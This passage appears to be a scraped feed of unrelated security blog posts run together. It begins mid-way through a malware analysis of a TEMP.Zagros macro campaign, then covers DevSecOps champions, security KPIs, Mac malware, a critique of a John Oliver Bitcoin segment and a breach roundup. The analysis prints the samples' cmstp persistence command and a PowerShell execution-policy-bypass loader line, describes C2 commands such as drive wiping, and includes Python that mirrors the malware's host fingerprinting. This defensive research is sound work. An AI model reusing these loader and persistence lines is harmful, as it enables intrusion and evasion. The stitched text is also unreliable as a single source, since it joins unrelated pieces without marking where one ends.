  • DefenderService.inf – The INF file that is used to invoke the above scriptlet file.
  • WindowsDefender.ini – The Base64 encoded and obfuscated PowerShell script.

After dropping the three files, the macro will set the following registry key to achieve persistence:

= cmstp.exe /s c:\programdata\DefenderService.inf

Upon system restart, cmstp.exe will be used to execute the SCT file indirectly through the INF file. This is possible because inside the INF file we have the following section:


That section gets indirectly invoked through the DefaultInstall_SingleUser section of INF, as shown in Figure 9.

Figure 9: Indirectly invoking SCT through the DefaultInstall_SingleUser section of INF

This method of code execution is performed in an attempt to evade security products. FireEye MVX and HX Endpoint Security technology successfully detect this code execution technique.
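As a rough illustration of how a defender might hunt for this persistence mechanism, here is a Python sketch that flags autorun entries invoking cmstp.exe with /s on an INF file. The value names and sample entries below are hypothetical; the post does not give the registry value name the malware sets:

```python
import re

# cmstp.exe invoked with /s on an INF file is rare in legitimate autoruns
SUSPICIOUS = re.compile(r"cmstp(\.exe)?\s+/s\s+\S+\.inf", re.IGNORECASE)

def find_cmstp_persistence(run_values):
    """Return Run-key entries whose command line matches the cmstp /s <inf> pattern.

    run_values maps value-name -> command line, e.g. as dumped from
    HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run.
    """
    return {name: cmd for name, cmd in run_values.items() if SUSPICIOUS.search(cmd)}

# Illustrative data only; the real value name used by the malware is not given here.
sample = {
    "OneDrive": r"C:\Users\x\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
    "WindowsDefenderUpdater": r"cmstp.exe /s c:\programdata\DefenderService.inf",
}
hits = find_cmstp_persistence(sample)
```

In practice the same pattern match could be applied to autoruns output or EDR telemetry rather than a hand-built dictionary.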

SCT File Analysis

The code of the Defender.sct file is obfuscated JavaScript. The main function performed by the SCT file is to Base64 decode the contents of the WindowsDefender.ini file and execute the decoded PowerShell script using the following command line:

powershell.exe -exec Bypass -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\\ProgramData\\WindowsDefender.ini))))

The rest of the malicious activities are performed by the PowerShell Script.
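An analyst can replicate that decode step offline without executing the payload. A small Python sketch follows; the payload used here is a stand-in, not the actual malware content. Note that .NET's [System.Text.Encoding]::Unicode is UTF-16LE, so the same two steps recover the PowerShell stage:

```python
import base64

def decode_payload(b64_text):
    """Mirror the SCT's decode step: Base64 decode, then UTF-16LE decode.

    This recovers the next-stage PowerShell as text for static analysis,
    without ever running it.
    """
    return base64.b64decode(b64_text).decode("utf-16-le")

# Round trip with a stand-in payload (not the actual malware content):
stage = 'Write-Output "hello"'
blob = base64.b64encode(stage.encode("utf-16-le")).decode("ascii")
recovered = decode_payload(blob)
```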

PowerShell File Analysis

The PowerShell script employs several layers of obfuscation to hide its actual functionality. In addition to obfuscation techniques, it can detect security tools on the analysis machine, and can shut down the system if it detects the presence of such tools.

Some of the key obfuscation techniques used are:

  • Character Replacement: Several instances of character replacement and string reversing techniques (Figure 10) make analysis difficult.

Figure 10: Character replacement and string reversing techniques

  • PowerShell Environment Variables: Nowadays, malware authors commonly mask critical strings such as “IEX” using environment variables. Some of the instances used in this script are:
    • $eNv:puBLic[13]+$ENv:pUBLIc[5]+'x'
    • ($ENV:cOMsPEC[4,26,25]-jOin'')
  • XOR encoding: The biggest section of the PowerShell script is XOR encoded using a single byte key, as shown in Figure 11.

Figure 11: PowerShell script is XOR encoded using a single byte key
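Single-byte XOR is trivially reversible, which an analyst can exploit to recover such a section. A minimal Python sketch follows; the key 0x42 and the marker string are illustrative, not taken from the actual sample:

```python
def xor_decode(data, key):
    """Single-byte XOR is its own inverse: applying it twice restores the data."""
    return bytes(b ^ key for b in data)

def brute_force_keys(data, marker=b"powershell"):
    """Try all 256 possible keys; return those whose output contains a known
    plaintext marker (case-insensitive)."""
    return [k for k in range(256) if marker in xor_decode(data, k).lower()]

# Round trip with a made-up key (0x42 is illustrative, not the campaign's key):
cipher = xor_decode(b"powershell -exec Bypass", 0x42)
plain = xor_decode(cipher, 0x42)
```

With only 256 candidate keys, brute force plus a known-plaintext marker usually recovers the section in milliseconds.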

After deobfuscating the contents of the PowerShell Script, we can divide it into three sections.

Section 1

The first section of the PowerShell script is responsible for setting different key variables that are used by the remaining sections of the PowerShell script, especially the following variables:

  • TEMpPAtH = "C:\ProgramData\" (the path used for storing the temp files)
  • Get_vAlIdIP = (used to get the public IP address of the machine)
  • FIlENAmePATHP = WindowsDefender.ini (file used to store Powershell code)
  • PRIVAtE = Private Key exponents
  • PUbLIc = Public Key exponents
  • Hklm = "HKLM:\Software\"
  • Hkcu = "HKCU:\Software\"
  • ValuE = "kaspersky"
  • DrAGon_MidDLe = [array of proxy URLs]

Among those variables, there is one variable of particular interest, DrAGon_MidDLe, which stores the list of proxy URLs (detailed at the end of the blog in the Network Indicators portion of the Indicators of Compromise section) that will be used to interact with the C2 server, as shown in Figure 12.

Figure 12: DrAGon_MidDLe stores the list of proxy URLs used to interact with C2 server

Section 2

The second section of the PowerShell script has the ability to perform encryption and decryption of messages that are exchanged between the system and the C2 server. The algorithm used for encryption and decryption is RSA, which leverages the public and private key exponents included in Section 1 of the PowerShell script.
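For reference, textbook RSA built from public and private exponents works as sketched below. The primes and exponents are tiny illustrative values, not the ones embedded in the script, and real deployments use large keys with padding:

```python
# Textbook RSA with tiny illustrative numbers.
p, q = 61, 53
n = p * q                      # modulus
phi = (p - 1) * (q - 1)
e = 17                         # public exponent
d = pow(e, -1, phi)            # private exponent: modular inverse of e (Python 3.8+)

def rsa_encrypt(m, e, n):
    """Encrypt integer m with the public exponent."""
    return pow(m, e, n)

def rsa_decrypt(c, d, n):
    """Decrypt integer c with the private exponent."""
    return pow(c, d, n)

message = 42
cipher = rsa_encrypt(message, e, n)
```

The malware's script performs the same modular exponentiation with its hard-coded exponents to protect messages exchanged with the C2 server.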

Section 3

The third section of the PowerShell script is the biggest section and has a wide variety of functionalities.

During analysis, we observed a code section where a message written in Chinese and hard coded in the script will be printed in the case of an error while connecting to the C2 server:

The English translation for this message is: “Cannot connect to website, please wait for dragon”.

Other functionalities provided by this section of the PowerShell Script are as follows:

  • Retrieves the following data from the system by leveraging Windows Management Instrumentation (WMI) queries and environment variables:
    • IP Address from Network Adapter Configuration
    • OS Name
    • OS Architecture
    • Computer Name
    • Computer Domain Name
    • Username

All of this data is concatenated and formatted as shown in Figure 13:

Figure 13: Concatenated and formatted data retrieved by PowerShell script
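For illustration, roughly the same fields can be gathered in Python. The separator and field order here are placeholders; the malware's actual format is the one shown in Figure 13:

```python
import getpass
import os
import platform
import socket

def local_ip():
    """Best-effort local IP; falls back if the hostname does not resolve."""
    try:
        return socket.gethostbyname(socket.gethostname())
    except OSError:
        return "127.0.0.1"

def collect_fingerprint(sep="|"):
    """Gather roughly the fields listed above (separator and order are illustrative)."""
    try:
        user = getpass.getuser()
    except (KeyError, OSError):
        user = "unknown"
    fields = [
        local_ip(),                            # IP address
        platform.system(),                     # OS name
        platform.machine(),                    # OS architecture
        platform.node(),                       # computer name
        os.environ.get("USERDNSDOMAIN", ""),   # domain name, if joined
        user,                                  # username
    ]
    return sep.join(fields)

fingerprint = collect_fingerprint()
```

The actual script uses WMI queries and environment variables on Windows; this cross-platform sketch only mirrors which fields are collected.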

  • Register the victim’s machine to the C2 server by sending the REGISTER command to the server. In response, if the status is OK, then a TOKEN is received from the C2 server that is used to synchronize the activities between the victim’s machine and the C2 server.

While sending to the C2 server, the data is formatted as follows:

@{SYSINFO  = $get.ToString(); ACTION = "REGISTER";}

  • Ability to take screenshots.
  • Checks for the presence of security tools (detailed in the Appendix) and if any of these security tools are discovered, then the system will be shut down, as shown in Figure 14.

Figure 14: System shut down upon discovery of security tools

  • Ability to receive PowerShell script from the C2 server and execute on the machine. Several techniques are employed for executing the PowerShell code:
    • If the command starts with “excel”, then it leverages the DDEInitiate Method of Excel.Application to execute the code: 
    • If the command starts with “outlook”, then it leverages Outlook.Application and MSHTA to execute the code: 
    • If the command starts with “risk”, then execution is performed through DCOM object: 
  • File upload functionality.
  • Ability to disable Microsoft Office Protected View (as shown in Figure 15) by setting the following keys in the Windows Registry:
    • DisableAttachmentsInPV
    • DisableInternetFilesInPV
    • DisableUnsafeLocationsInPV

Figure 15: Disabling Microsoft Office Protected View

  • Ability to remotely reboot or shut down or clean the system based on the command received from the C2 server, as shown in Figure 16.

Figure 16: Reboot, shut down and clean commands

  • Ability to sleep for a given number of seconds.

The following C2 commands are supported by this PowerShell script (the command names from the original table were not preserved):

  • Reboot the system using the shutdown command
  • Shut down the system using the shutdown command
  • Wipe the drives C:\, D:\, E:\ and F:\
  • Take a screenshot of the system
  • Encrypt and upload the information from the system
  • Leverage the Excel.Application COM object for code execution
  • Leverage the Outlook.Application COM object for code execution
  • Leverage a DCOM object for code execution

This activity shows us that TEMP.Zagros stays up-to-date with the latest code execution and persistence techniques, and that they can quickly leverage these techniques to update their malware. By combining multiple layers of obfuscation, they hinder reverse engineering and attempt to evade security products.

Users can protect themselves from such attacks by disabling Office macros in their settings and also by being more vigilant when enabling macros (especially when prompted) in documents, even if such documents are from seemingly trusted sources.

Indicators of Compromise

Macro based Documents and Hashes

The following lure document names were observed (the SHA256 hashes and targeted regions from the original table were not preserved):

  • Invest in Turkey.doc
  • güvenlik yönergesi. .doc
  • Türkiye Cumhuriyeti Kimlik Kartı.doc
  • Turkish Armed Forces.doc
  • Connectel .pk.doc
  • Güvenlik Yönergesi.doc
  • Güvenlik Yönergesi.doc
  • Anadolu Güneydoğu Projesinde .doc

Network Indicators

List of Proxy URLs

Security Tools Checked on the Machine

Security: Create a Development Champion

We talk a lot about the need for development teams to create security champions. With the shift to DevOps – and the intersecting of development, security, and operations teams – development and security teams can no longer operate in their traditional silos. Each team needs to not only work closely with the others, but also have a much deeper understanding of the others’ pains, processes, and priorities. For most developers, this is uncharted territory. Security has simply not been part of their jobs or training; in fact, the vast majority have had no training on secure coding, either in college or on the job.

We solve this problem in part here at CA Veracode by creating security champions on our development teams, and we recommend and coach our customers to do the same. Security champions help to reduce culture conflict between development and security by amplifying the security message on a peer-to-peer level. They don’t need to be experts; they serve more as the “security consciousness” of the group.

But what about a development champion on the security team? Just as developers are in uncharted territory with security, the security team often has limited understanding of how the development team works. What if the security team had a development champion who was tasked with getting to know and understand the development team and their processes and bringing that knowledge and understanding back to the team? The reality is that in a DevOps world, the security team does need a much more thorough understanding of the development process than they did in the past; they simply won’t be able to do their jobs effectively and integrate security into the development process without a deep understanding of how this team works.

The development champion would spend time with the development team, getting a clear picture of their day-to-day tasks, their priorities, their pain points. Additionally, this person would spend some time learning how to code and becoming familiar with the tools developers use, and bring that understanding back to his or her team. Finally, as security shifts left, the security team will need at least a high-level understanding of developer tools like IDEs, build systems, and configuration management tools, in order to embed security tools and processes into developer workflows. What does a development champion look like?

Check out the Anatomy of a Development Champion:

Want to be the development champion on your team?

Start with our toolkit – Understanding the Dev in DevSecOps: A Toolkit for the Security Team.

Early Bird Gets The Worm – Application Security Weekly #08

This week, Paul and Keith talk about “The Phoenix Project”, Amazon admits Alexa is creepily laughing at people, Ethereum fixes serious ‘eclipse’ flaw, Kali Linux is now an app in the Windows App Store, Docker + Minecraft = Dockercraft, and more on this episode of Application Security Weekly!


Full Show Notes:


Visit for all the latest episodes!

Measure Security Performance, Not Policy Compliance

I started my security (post-sysadmin) career heavily focused on security policy frameworks. It took me down many roads, but everything always came back to a few simple notions, such as that policies were a means of articulating security direction, that you had to prescriptively articulate desired behaviors, and that the more detail you could put into the guidance (such as in standards, baselines, and guidelines), the better off the organization would be. Except, of course, that in the real world nobody ever took time to read the more detailed documents, Ops and Dev teams really didn't like being told how to do their jobs, and, at the end of the day, I was frequently reminded that publishing a policy document didn't translate to implementation.

Subsequently, I've spent the past 10+ years thinking about better ways to tackle policies, eventually reaching the point where I believe "less is more" and that anything written and published in a place and format that isn't "work as usual" will rarely, if ever, get implemented without a lot of downward force applied. I've seen both good and bad policy frameworks within organizations. Often they cycle around between good and bad. Someone will build a nice policy framework, it'll get implemented in a number of key places, and then it will languish from neglect and inadequate upkeep until it's irrelevant and ignored. This is not a recipe for lasting success.

Thinking about it further this week, it occurred to me that part of the problem is thinking in the old "compliance" mindset. Policies are really to blame for driving us down the checkbox-compliance path. Sure, we can easily stand back and try to dictate rules, but without the adequate authority to enforce them, and without the resources needed to continually update them, they're doomed to obsolescence. Instead, we need to move to that "security as code" mentality and find ways to directly codify requirements in ways that are naturally adapted and maintained.

End Dusty Tomes and (most) Out-of-Band Guidance

The first daunting challenge of security policy framework reform is to throw away the old, broken approach with as much gusto and finality as possible. Yes, there will always be a need for certain formally documented policies, but overall an organization Does. Not. Need. large amounts of dusty tomes providing out-of-band guidance to a non-existent audience.

Now, note a couple things here. First, there is a time and a place for providing out-of-band guidance, such as via direct training programs. However, it should be the minority of guidance, and wherever possible you should seek to codify security requirements directly into systems, applications, and environments. For a significant subset of security practices, it turns out we do not need to repeatedly consider whether or not something should be done, but can instead make the decision once and then roll it out everywhere as necessary and appropriate.

Second, we have to realize and accept that traditional policy (and related) documents only serve a formal purpose, not a practical or pragmatic purpose. Essentially, the reason you put something into writing is because a) you're required to do so (such as by regulations), or b) you're driven to do so due to ongoing infractions or the inability to directly codify requirements (for example, requirements on human behavior). What this leaves you with are requirements that can be directly implemented and that are thus easily measurable.

KPIs as Policies (et al.)

If the old ways aren't working, then it's time to take a step back and think about why that might be and what might be better going forward. I'm convinced the answer to this query lies in stretching the "security as code" notion a step further by focusing on security performance metrics for everything and everyone instead of security policies. Specifically, if you think of policies as requirements, then you should be able to recast those as metrics and key performance indicators (KPIs) that are easily measured, and in turn are easily integrated into dashboards. Moreover, going down this path takes us into a much healthier sense of quantitative reasoning, which can pay dividends for improved information risk awareness, measurement, and management.

Applied, this approach scales very nicely across the organization. Businesses already operate on a KPI model, and converting security requirements (née policies) into specific measurables at various levels of the organization means ditching the ineffective, out-of-band approach previously favored for directly specifying, measuring, and achieving desired performance objectives. Simply put, we no longer have to go out of our way to argue for people to conform to policies, but instead simply start measuring their performance and incentivize them to improve to meet performance objectives. It's then a short step to integrating security KPIs into all roles, even going so far as to establish departmental, if not whole-business, security performance objectives that are then factored into overall performance evaluations.

Examples of security policies-become-KPIs might include metrics around vulnerability and patch management, code defect reduction and remediation, and possibly even phishing-related metrics that are rolled up to the department or enterprise level. When creating security KPIs, think about the policy requirements as they're written and take time to truly understand the objectives they're trying to achieve. Convert those objectives into measurable items, and there you are on the path to KPIs as policies. For more on thoughts on security metrics, I recommend checking out the CIS Benchmarks as a starting point.
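As a concrete sketch of this conversion, a policy like "critical patches applied within 30 days" can be recast as a KPI computed directly from asset data. The field names and records below are hypothetical; in practice they would come from a vulnerability scanner or CMDB export:

```python
# Hypothetical asset records; in practice these would come from a
# vulnerability scanner or CMDB export, not hand-written dicts.
assets = [
    {"host": "web-01", "critical_patch_age_days": 3},
    {"host": "web-02", "critical_patch_age_days": 45},
    {"host": "db-01",  "critical_patch_age_days": 10},
]

def patch_kpi(records, sla_days=30):
    """Recast the policy 'critical patches applied within 30 days' as a KPI:
    the percentage of assets currently inside the SLA window."""
    within = sum(1 for r in records if r["critical_patch_age_days"] <= sla_days)
    return 100.0 * within / len(records)

score = patch_kpi(assets)  # trend this on a dashboard instead of auditing policy text
```

The same pattern applies to code-defect remediation or phishing metrics: identify the objective behind the written requirement, then compute it continuously from live data.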

Better Reporting and the Path to Accountability

Converting policies into KPIs means that nearly everything is natively built for reporting, which in turn enables executives to have better insight into the security and information risk of the organization. Moreover, shifting the focus to specific measurables means that we get away from the out-of-band dusty tomes, instead moving toward achieving actual results. We can now look at how different teams, projects, applications, platforms, etc., are performing and make better-informed decisions about where to focus investments for improvements.

This notion also potentially sparks an interesting future for current GRC-ish products. If policies go away (mostly), then we don't really need repositories for them. Instead, GRC products can shift to being true performance monitoring dashboards, allowing those products to broaden their scope while continuing to adapt other capabilities, such as those related to the so-called "SOAR" market (Security Orchestration, Automation, and Response). If GRC products are to survive, I suspect it will be by either heading further down the information risk management path, pulling in security KPIs in lieu of traditional policies and compliance, or it will drive more toward SOAR+dashboards with a more tactical performance focus (or some combination of the two). Suffice to say, I think GRC as it was once known and defined is in its final days of usefulness.

There's one other potentially interesting tie-in here, and that's to overall data analytics, which I've noticed slowly creeping into organizations. A lot of the focus has been on using data lakes, mining, and analytics in lieu of traditional SIEM and log management, but I think there's a potentially interesting confluence with security KPIs, too. In fact, once you pull in SOAR capabilities and other monitoring and assessment data, it's not unreasonable to think that KPIs become the tweakable dials CISOs (and up) use to balance risk vs. reward in providing strategic guidance for addressing information risk within the enterprise. At any rate, this is all very speculative and unclear right now, but something to watch nonetheless. But I digress...

The bottom line here is this: traditional policy frameworks have generally outlived their usefulness. We cannot afford to continue writing and publishing security requirements in a format that isn't easily accessible as part of everyday work. In an Agile/DevOps world, "security as code" is imperative, and that includes converting security requirements into KPIs.

Warning as Mac malware exploits climb 270%

Reputable anti-malware security vendor Malwarebytes is warning Mac users that malware attacks against the platform climbed 270 percent last year.

Be careful out there

The security experts also warn that four new malware exploits targeting Macs have been identified in the first two months of 2018, noting that many of these exploits were identified by users, rather than security firms.

In one instance, a Mac user discovered that their DNS settings had been changed and found themselves unable to change them back.


What John Oliver gets wrong about Bitcoin

John Oliver covered bitcoin/cryptocurrencies last night. I thought I'd describe a bunch of things he gets wrong.

How Bitcoin works

Nowhere does the show describe what Bitcoin is and how it works.

Discussions should always start with Satoshi Nakamoto's original paper. The thing Satoshi points out is that there is an important cost to normal transactions, namely, the entire legal system designed to protect you against fraud, such as the way you can reverse the transactions on your credit card if it gets stolen. The point of Bitcoin is that there is no way to reverse a charge. A transaction is done via cryptography: to transfer money to me, you sign the transaction with your private key, assigning the coins to my public key. Ownership passes to me with no third party involved that can reverse the transaction, and essentially no overhead.

All the rest of the stuff, like the decentralized blockchain and mining, is all about making that work.
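To make the ownership-transfer idea concrete, here is a toy sketch using textbook RSA with tiny primes. This is deliberately insecure and illustrative only; Bitcoin actually uses ECDSA signatures over the secp256k1 curve. The principle is the same, though: only the holder of the private key can produce a valid signature over a transaction, and anyone can verify it with the public key.

```python
import hashlib

# Toy textbook-RSA signature with tiny primes -- insecure, purely
# illustrative of "sign with private key, verify with public key".

p, q = 61, 53
n = p * q                          # public modulus
e = 17                             # public exponent
d = pow(e, -1, (p - 1) * (q - 1))  # private exponent (Python 3.8+)

def h(msg: str) -> int:
    # Hash the message down to an integer in the modulus range.
    return int.from_bytes(hashlib.sha256(msg.encode()).digest(), "big") % n

def sign(msg: str, priv: int) -> int:
    return pow(h(msg), priv, n)

def verify(msg: str, sig: int, pub: int) -> bool:
    return pow(sig, pub, n) == h(msg)

tx = "transfer 1 coin from Alice to Bob's public key"
sig = sign(tx, d)                  # only the holder of d can produce this

print(verify(tx, sig, e))              # → True: anyone can check with (n, e)
print(verify(tx, (sig + 1) % n, e))    # → False: a forged signature fails
```

Because nothing here requires a bank or card network to vouch for the transfer, there is also nothing that can reverse it, which is exactly Satoshi's point.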

Bitcoin crazies forget about Bitcoin's original genesis. For example, they talk about adding features to stop fraud, reverse transactions, and have a central authority that manages it all. This misses the point, because the existing electronic banking system already does that, and does a better job of it than cryptocurrencies ever can. If you want to mock cryptocurrencies, talk about the "DAO", which did exactly that -- and collapsed in a big fraudulent scheme where insiders made money and outsiders didn't.

Sticking to Satoshi's original ideas is a lot better than repeating how the crazy fringe activists define Bitcoin.

How does any money have value?

Oliver's answer is currencies have value because people agree that they have value, like how they agree a Beanie Baby is worth $15,000.

This is wrong. A better way of framing the question is to ask why the value of money changes. The dollar has been losing roughly 2% of its value each year for decades. This is called "inflation": as the dollar loses value, it takes more dollars to buy things, which means the price of things (in dollars) goes up, and employers have to pay us more dollars so that we can buy the same amount of things.

The reason the value of the dollar changes is largely that the Federal Reserve manages the supply of dollars, exploiting the law of Supply and Demand. As you know, if the supply of something decreases (like oil), the price goes up; if the supply increases, the price goes down. The Fed manages money the same way: when prices rise (the dollar is worth less), the Fed reduces the supply of dollars, causing each dollar to be worth more. Conversely, if prices fall (or don't rise fast enough), the Fed increases the supply, so that the dollar is worth less.

The reason money follows the law of Supply and Demand is that people use money; they consume it like they do other goods and services, such as gasoline, tax preparation, food, and dance lessons. It's not like a fine art painting, a stamp collection, or a Beanie Baby -- money is a product. It's just that people have a hard time thinking of it as a consumer product since, in their experience, money is what they use to buy consumer products. But it's a symmetric operation: when you buy gasoline with dollars, you are actually selling dollars in exchange for gasoline. That you call one side of this transaction "money" and the other "goods" is purely arbitrary; you could just as well call gasoline the money and dollars the good being bought and sold for gasoline.

The reason dollars are a product is that trying to use gasoline as money is a pain in the neck: storing it and exchanging it is difficult. Goods like this do become money; prisons famously use cigarettes as a medium of exchange, even among non-smokers. But to serve as money, a good has to be fungible, storable, and easily exchanged. Dollars are the most fungible, the most storable, and the most easily exchanged, so they have the most value as "money". Sure, the mechanic can fix the farmer's car for three chickens instead, but most of the time, both parties in the transaction would rather exchange the same value using dollars than chickens.

So the value of dollars is not like the value of Beanie Babies, which someone might buy for $15,000 and which changes purely on the whims of investors. Instead, dollars are like gasoline, obeying the law of Supply and Demand.

This brings us back to the question of where Bitcoin gets its value. While Bitcoin is indeed used like dollars to buy things, that's only a tiny use of the currency, so its value isn't determined by Supply and Demand. Instead, the value of Bitcoin is a lot like that of Beanie Babies, obeying the laws of investments. So in this respect, Oliver is right about where the value of Bitcoin comes from, but wrong about where the value of dollars comes from.

Why Bitcoin conference didn't take Bitcoin

John Oliver points out the irony of a Bitcoin conference that stopped accepting payments in Bitcoin for tickets.

The biggest reason for this is that Bitcoin has become so popular that transaction fees have gone up. Instead of being proof of failure, it's proof of popularity. What John Oliver is repeating is the old joke that nobody goes to that popular restaurant anymore because it's too crowded and you can't get a reservation.

Moreover, the point of Bitcoin is not to replace everyday currencies for everyday transactions. If you read Satoshi Nakamoto's whitepaper, its only goal is to replace certain types of transactions, namely purely electronic ones where electronic goods and services are being exchanged. Where real-life goods/services are being exchanged, existing currencies work just fine. It's only the crazy activists who claim Bitcoin will eventually replace real-world currencies -- the saner people see it co-existing with real-world currencies, each with a different value to consumers.

Turning a McNugget back into a chicken

John Oliver uses the metaphor that while you can process a chicken into McNuggets, you can't reverse the process. It's a funny metaphor.

But it's not clear what the heck this metaphor is trying to explain. It's not a metaphor for the blockchain, but for a "cryptographic hash", where each block is a chicken, and the McNugget is the fingerprint of the block (well, of the block plus the fingerprint of the last block, forming a chain).

Even then, the metaphor has problems. For it to accurately describe a cryptographic hash, the McNugget produced from each chicken must be unique to that chicken. You can then check whether a given chicken matches its McNugget. A slight change in the original chicken, like losing a feather, results in a completely different McNugget. Thus, nuggets can be used to tell if the original chicken has changed.

This then leads to the key property of the blockchain: it is unalterable. You can't go back and change any of the blocks of data, because the fingerprints, the nuggets, will also change, and break the nugget chain.
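That property is easy to demonstrate. Here is a minimal sketch (illustrative only, not Bitcoin's actual block format) of a "nugget chain" where each fingerprint covers the block's data plus the previous fingerprint:

```python
import hashlib

# Minimal "nugget chain": each block's fingerprint covers its own data
# plus the previous block's fingerprint, so altering any early block
# changes every fingerprint after it.

def fingerprint(data: str, prev_hash: str) -> str:
    return hashlib.sha256((prev_hash + data).encode()).hexdigest()

def build_chain(blocks):
    hashes, prev = [], ""
    for data in blocks:
        prev = fingerprint(data, prev)
        hashes.append(prev)
    return hashes

original = build_chain(["alice->bob 1", "bob->carol 2", "carol->dave 3"])
tampered = build_chain(["alice->bob 9", "bob->carol 2", "carol->dave 3"])

# Changing the first block ("losing a feather") changes every
# fingerprint from that point on, even though later blocks are intact:
print(original[0] == tampered[0])   # → False
print(original[2] == tampered[2])   # → False
```

This is why you can't quietly rewrite history in a blockchain: the altered block's nugget no longer matches, and neither does any nugget after it.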

The point is that John Oliver laughs at a silly metaphor for explaining the blockchain because he totally misses the point of the metaphor.

Oliver rightly says "don't worry if you don't understand it -- most people don't", but that includes the big companies that John Oliver names. Some companies do get it and are producing reasonable things (like JP Morgan, by all accounts), but some don't. IBM and other big consultancies are charging companies millions of dollars to consult on blockchain products where nobody involved, neither the customer nor the consultancy, actually understands any of it. That doesn't stop them from happily charging customers on one side and happily spending money on the other.

Thus, rather than explaining the problem, Oliver is just being part of the problem. His explanation of the blockchain left you dumber than before.


John Oliver mocks the Brave ICO ($35 million in 30 seconds), claiming it's all driven by YouTube personalities and people who aren't looking at the fundamentals.

And while it's true that most ICOs are bunk, the Brave ICO actually had a business model behind it. Brave is a Chrome-like web browser whose distinguishing feature is that it protects your privacy from advertisers. If you don't use Brave or a browser with an ad-blocking extension, you have no idea how bad things are for you. However, this presents a problem for websites that fund themselves via advertisements, which is most of them, because visitors no longer see ads. Brave has a fix for this. Most people wouldn't mind supporting the websites they visit often, like the New York Times. That's where the Brave ICO "token" comes in: it's not simply stock in Brave, but a token for micropayments to websites. Users buy tokens, then use them for micropayments to websites like the New York Times, which then sells the tokens back to the market for dollars. The buying and selling of tokens happens without a centralized middleman.

This is all still speculative, of course, and it remains to be seen how successful Brave will be, but it's a serious effort. It has well-respected VCs behind the company, a well-respected founder (despite the fact he invented JavaScript), and well-respected employees. It's not a scam; it's a legitimate venture.

How do you make money from Bitcoin?

The last part of the show is dedicated to describing all the scams out there, advising people to be careful and to be "responsible". This is garbage.

It's like my simple two-step process for making lots of money via Bitcoin: (1) buy when the price is low, and (2) sell when the price is high. My advice is correct, of course, but useless. Same as "be careful" and "invest responsibly".

The truth about investing in cryptocurrencies is "don't". The only responsible way to invest is to buy low-overhead market index funds and hold for retirement. No, you won't get super rich doing this, but anything other than this is irresponsible gambling.

It's a hard lesson to learn, because everyone is telling you the opposite. The entire channel CNBC is devoted to day traders, who buy and sell stocks at a high rate based on the same principle as a Ponzi scheme, basing their judgment not on the fundamentals (like long-term dividends) but on the animal spirits of whatever stock is hot or cold at the moment. This is the same reason people buy or sell Bitcoin: not because they can describe its fundamental value, but because they believe in a bigger fool down the road who will buy it for even more.

For things like Bitcoin, the trick to making money was to have bought it over seven years ago, when it was essentially worthless except to nerds who were into that sort of thing. It's the same trick to making a lot of money in Magic: The Gathering trading cards, which nerds bought decades ago and which are worth a ton of money now. Or to have bought Apple stock back in 2009, when the iPhone was new and nerds could understand the potential of real Internet access and apps in a way that Wall Street could not.

That was my strategy: be a nerd who gets into things. I've made a good amount of money on all of these because, as a nerd, I was into Magic: The Gathering, Bitcoin, and the iPhone before anybody else was, and bought in at the point where these things were essentially valueless.

At this point with cryptocurrencies, with the non-nerds now flooding the market, there's little chance of making it rich. The lottery is probably a better bet. Instead, if you want to make money, become a nerd: obsess about a thing, understand it while it's new, and cash out once the rest of the market figures it out. That might be Brave, for example, but buy into it because you've spent the last year studying the browser advertisement ecosystem, the market's willingness to pay for content, and how their Basic Attention Token delivers value to websites -- not because you want in on the ICO craze.


John Oliver spends 25 minutes explaining Bitcoin, cryptocurrencies, and the blockchain to you. Sure, it's funny, but it leaves you worse off than when it started. The show admits it "simplified" the explanation, but it simplified it so much that it removed all useful information.

Weekly Cyber Risk Roundup: Payment Card Breaches, Encryption Debate, and Breach Notification Laws

This past week saw the announcement of several new payment card breaches, including a point-of-sale breach at Applebee’s restaurants that affected 167 locations across 15 states.

The malware, which was discovered on February 13, 2018, was “designed to capture payment card information and may have affected a limited number of purchases” made at Applebee’s locations owned by RMH Franchise Holdings, the company said in a statement.

News outlets reported that many of the affected locations had their systems infected between early December 2017 and early January 2018. Applebee's has close to 2,000 locations around the world, 167 of which were affected by the incident.

In addition to Applebee's, MenuDrive issued a breach notification to merchants saying that its desktop ordering site was injected with malware designed to capture payment card information. The incident impacted certain transactions from November 5, 2017 to November 28, 2017.

“We have learned that the malware was contained to ONLY the Desktop ordering site of the version that you are using and certain payment gateways,” the company wrote. “Thus, this incident was contained to a part of our system and did NOT impact the Mobile ordering site or any other MenuDrive versions.”

Finally, there is yet another breach notification related to Sabre Hospitality Solutions’ SynXis Central Reservations System — this time affecting Preferred Hotels & Resorts. Sabre said that an unauthorized individual used compromised user credentials to view reservation information, including payment card information, for a subset of hotel reservations that Sabre processed on behalf of the company between June 2016 and November 2017.


Other trending cybercrime events from the week include:

  • Marijuana businesses targeted: MJ Freeway Business Solutions, which provides business management software to cannabis dispensaries, is notifying customers of unauthorized access to its systems that may have led to personal information being stolen. The Canadian medical marijuana delivery service JJ Meds said that it received an extortion threat demanding $1,000 in bitcoin in order to prevent a leak of customer information.
  • Healthcare breach notifications: The Kansas Department for Aging and Disability Services said that the personal information of 11,000 people was improperly emailed to local contractors by a now-fired employee. Front Range Dermatology Associates announced a breach related to a now-fired employee providing patient information to a former employee. Investigators said two Florida Hospital employees stole patient records, and local news reported that 9,000 individuals may have been impacted by the theft.
  • Notable data breaches: Ventiv Technology, which provides workers’ compensation claim management software solutions, is notifying customers of a compromise of employee email accounts that were hosted on Office365 and contained personal information. Catawba County services employees had their personal information compromised due to the payroll and human resources system being infected with malware. Flexible Benefit Service Corporation said that an employee email account was compromised and used to search for wire payment information. A flaw in Nike’s website allowed attackers to read server data and could have been leveraged to gain greater access to the company’s systems. A researcher claimed that airline Emirates is leaking customer data.
  • Other notable events: Cary E. Williams CPA is notifying employees, shareholders, trustees and partners of a ransomware attack that led to unauthorized access to its systems. The cryptocurrency exchange Binance said that its users were the target of “a large scale phishing and stealing attempt” and those compromised accounts were used to perform abnormal trading activity over a short period of time. The spyware company Retina-X Studios said that it “is immediately and indefinitely halting its PhoneSheriff, TeenShield, SniperSpy and Mobile Spy products” after being “the victim of sophisticated and repeated illegal hackings.”

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.


Cyber Risk Trends From the Past Week


